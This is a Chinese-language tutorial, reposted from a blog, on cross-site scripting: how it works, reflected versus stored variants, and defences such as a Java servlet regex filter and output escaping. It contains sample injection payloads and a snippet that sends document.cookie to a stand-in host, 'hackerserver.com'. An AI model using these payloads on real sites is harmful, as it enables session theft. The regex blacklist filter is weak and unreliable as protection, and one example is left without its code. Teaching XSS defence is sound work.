概述
XSS攻擊是Web攻擊中最常見的攻擊方法之一,它是通過對網頁注入可執行代碼且成功地被浏覽器 執行,達到攻擊的目的,形成了一次有效XSS攻擊,一旦攻擊成功,它可以擷取使用者的聯系人清單,然後向聯系人發送虛假詐騙資訊,可以删除使用者的日志等等,有時候還和其他攻擊方式同時實 施比如SQL注入攻擊伺服器和資料庫、Click劫持、相對連結劫持等實施釣魚,它帶來的危害是巨 大的,是web安全的頭号大敵。
攻擊的條件
實施XSS攻擊需要具備兩個條件:
一、需要向web頁面注入惡意代碼;
二、這些惡意代碼能夠被浏覽器成功的執行。
看一下下面這個例子:
<div id="el" style="background:url('javascript:eval(document.getElementById("el").getAttribute("code")) ')"
code="var a = document.createElement('a');
a.innerHTML= '執行了惡意代碼';document.body.appendChild(a);
//這這裡執行代碼
"></div> 這段代碼在舊版的IE8和IE8以下的版本都是可以被執行的,火狐也能執行代碼,但火狐對其禁止通路DOM對象,是以在火狐下執行将會看到控制裡抛出異常:document is not defined (document是沒有定義的)
再來看一下面這段代碼:
<div>
<img src="/images/handler.ashx?id=<%= Request.QueryString["id"] %>" />
</div> 相信很多程式員都覺得這個代碼很正常,其實這個代碼就存在一個反射型的XSS攻擊,假如輸入下面的位址:
http://www.xxx.com/?id=" /><script>alert(/xss/)</script><br x="
最終反射出來的HTML代碼:
<div>
<img src="/images/handler.ashx?id=" /><script>alert(/xss/)</script><br x="" />
</div> 也許您會覺得把ValidateRequest設定為true或者保持預設值就能高枕無憂了,其實這種情況還可以輸入下面的位址達到相同的攻擊效果:
http://www.xxx.com/?id=xx" οnerrοr="this.onload()" οnlοad="alert(/xss/)" x=" 根據XSS攻擊的效果可以分為幾種類型
第一、XSS反射型攻擊,惡意代碼并沒有儲存在目标網站,通過引誘使用者點選一個連結到目标網站的惡意連結來實施攻擊的。
第二、XSS存儲型攻擊,惡意代碼被儲存到目标網站的伺服器中,這種攻擊具有較強的穩定性和持久性,比較常見場景是在部落格,論壇等社交網站上,但OA系統,和CRM系統上也能看到它身影,比如:某CRM系統的客戶投訴功能上存在XSS存儲型漏洞,黑客送出了惡意攻擊代碼,當系統管理者檢視投訴資訊時惡意代碼執行,竊取了客戶的資料,然而管理者毫不知情,這就是典型的XSS存儲型攻擊。
XSS攻擊能做些什麼
1.竊取cookies,讀取目标網站的cookie發送到黑客的伺服器上,如下面的代碼:
var i=document.createElement("img");
document.body.appendChild(i);
i.src = "http://www.hackerserver.com/?c=" + document.cookie; 2.讀取使用者未公開的資料,如果:郵件清單或者内容、系統的客戶資料,聯系人清單等等,如代碼:
解決方法
一種方法是在表單送出或者url參數傳遞前,對需要的參數進行過濾,請看如下XSS過濾工具類代碼
在項目的web.xml配置過濾器:
<filter>
<filter-name>XssEscape</filter-name>
<filter-class>XssFilter</filter-class>
</filter>
<filter-mapping>
<filter-name>XssEscape</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping> XssFilter實作:
public class XssFilter implements Filter {
@Override
public void init(FilterConfig filterConfig) throws ServletException {
}
@Override
public void doFilter(ServletRequest request, ServletResponse response,
FilterChain chain) throws IOException, ServletException {
chain.doFilter(new XssHttpServletRequestWrapper((HttpServletRequest) request), response);
}
@Override
public void destroy() {
}
} XssHttpServletRequestWrapper實作
public class XssHttpServletRequestWrapper extends HttpServletRequestWrapper {
public XssHttpServletRequestWrapper(HttpServletRequest request) {
super(request);
}
@SuppressWarnings("rawtypes")
public Map<String,String[]> getParameterMap(){
Map<String,String[]> request_map = super.getParameterMap();
Iterator iterator = request_map.entrySet().iterator();
while(iterator.hasNext()){
Map.Entry me = (Map.Entry)iterator.next();
String[] values = (String[])me.getValue();
for(int i = 0 ; i < values.length ; i++){
values[i] = xssClean(values[i]);
}
}
return request_map;
}
public String[] getParameterValues(String paramString)
{
String[] arrayOfString1 = super.getParameterValues(paramString);
if (arrayOfString1 == null)
return null;
int i = arrayOfString1.length;
String[] arrayOfString2 = new String[i];
for (int j = 0; j < i; j++){
arrayOfString2[j] = xssClean(arrayOfString1[j]);
}
return arrayOfString2;
}
public String getParameter(String paramString)
{
String str = super.getParameter(paramString);
if (str == null)
return null;
return xssClean(str);
}
public String getHeader(String paramString)
{
String str = super.getHeader(paramString);
if (str == null)
return null;
str = str.replaceAll("\r|\n", "");
return xssClean(str);
}
private String xssClean(String value) {
//ClassLoaderUtils.getResourceAsStream("classpath:antisamy-slashdot.xml", XssHttpServletRequestWrapper.class)
if (value != null) {
// NOTE: It's highly recommended to use the ESAPI library and
// uncomment the following line to
// avoid encoded attacks.
// value = encoder.canonicalize(value);
value = value.replaceAll("\0", "");
// Avoid anything between script tags
Pattern scriptPattern = Pattern.compile("<script>(.*?)</script>",
Pattern.CASE_INSENSITIVE);
value = scriptPattern.matcher(value).replaceAll("");
// Avoid anything in a src='...' type of expression
scriptPattern = Pattern.compile("src[\r\n]*=[\r\n]*\\\'(.*?)\\\'",
Pattern.CASE_INSENSITIVE | Pattern.MULTILINE
| Pattern.DOTALL);
value = scriptPattern.matcher(value).replaceAll("");
// Avoid anything in a href='...' type of expression
scriptPattern = Pattern.compile("href[\r\n]*=[\r\n]*\\\"(.*?)\\\"",
Pattern.CASE_INSENSITIVE | Pattern.MULTILINE
| Pattern.DOTALL);
value = scriptPattern.matcher(value).replaceAll("");
// Remove any lonesome </script> tag
scriptPattern = Pattern.compile("</script>",
Pattern.CASE_INSENSITIVE);
value = scriptPattern.matcher(value).replaceAll("");
// Remove any lonesome <script ...> tag
scriptPattern = Pattern.compile("<script(.*?)>",
Pattern.CASE_INSENSITIVE | Pattern.MULTILINE
| Pattern.DOTALL);
value = scriptPattern.matcher(value).replaceAll("");
// Avoid eval(...) expressions
scriptPattern = Pattern.compile("eval\\((.*?)\\)",
Pattern.CASE_INSENSITIVE | Pattern.MULTILINE
| Pattern.DOTALL);
value = scriptPattern.matcher(value).replaceAll("");
// Avoid expression(...) expressions
scriptPattern = Pattern.compile("expression\\((.*?)\\)",
Pattern.CASE_INSENSITIVE | Pattern.MULTILINE
| Pattern.DOTALL);
value = scriptPattern.matcher(value).replaceAll("");
// Avoid javascript:... expressions
scriptPattern = Pattern.compile("javascript:",
Pattern.CASE_INSENSITIVE);
value = scriptPattern.matcher(value).replaceAll("");
// Avoid vbscript:... expressions
scriptPattern = Pattern.compile("vbscript:",
Pattern.CASE_INSENSITIVE);
value = scriptPattern.matcher(value).replaceAll("");
// Avoid οnlοad= expressions
scriptPattern = Pattern.compile("onload(.*?)=",
Pattern.CASE_INSENSITIVE | Pattern.MULTILINE
| Pattern.DOTALL);
value = scriptPattern.matcher(value).replaceAll("");
}
return value;
}
} 二、 過濾使用者輸入的 檢查使用者輸入的内容中是否有非法内容。如<>(尖括号)、”(引号)、 ‘(單引号)、%(百分比符号)、;(分号)、()(括号)、&(& 符号)、+(加号)等。、嚴格控制輸出
可以利用下面這些函數對出現xss漏洞的參數進行過濾
1、htmlspecialchars() 函數,用于轉義處理在頁面上顯示的文本。
2、htmlentities() 函數,用于轉義處理在頁面上顯示的文本。
3、strip_tags() 函數,過濾掉輸入、輸出裡面的惡意标簽。
4、header() 函數,使用header("Content-type:application/json"); 用于控制 json 資料的頭部,不用于浏覽。
5、urlencode() 函數,用于輸出處理字元型參數帶入頁面連結中。
6、intval() 函數用于處理數值型參數輸出頁面中。
7、自定義函數,在大多情況下,要使用一些常用的 html 标簽,以美化頁面顯示,如留言、小紙條。那麼在這樣的情況下,要采用白名單的方法使用合法的标簽顯示,過濾掉非法的字元。
各語言示例:
PHP的htmlentities()或是htmlspecialchars()。
Python的cgi.escape()。
ASP的Server.HTMLEncode()。
ASP.NET的Server.HtmlEncode()或功能更強的Microsoft Anti-Cross Site Scripting Library
Java的xssprotect(Open Source Library)。
Node.js的node-validator。 轉載于:https://www.cnblogs.com/shawWey/p/8480452.html
![使用 ctypes 進行 Python 和 C 的混合程式設計[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)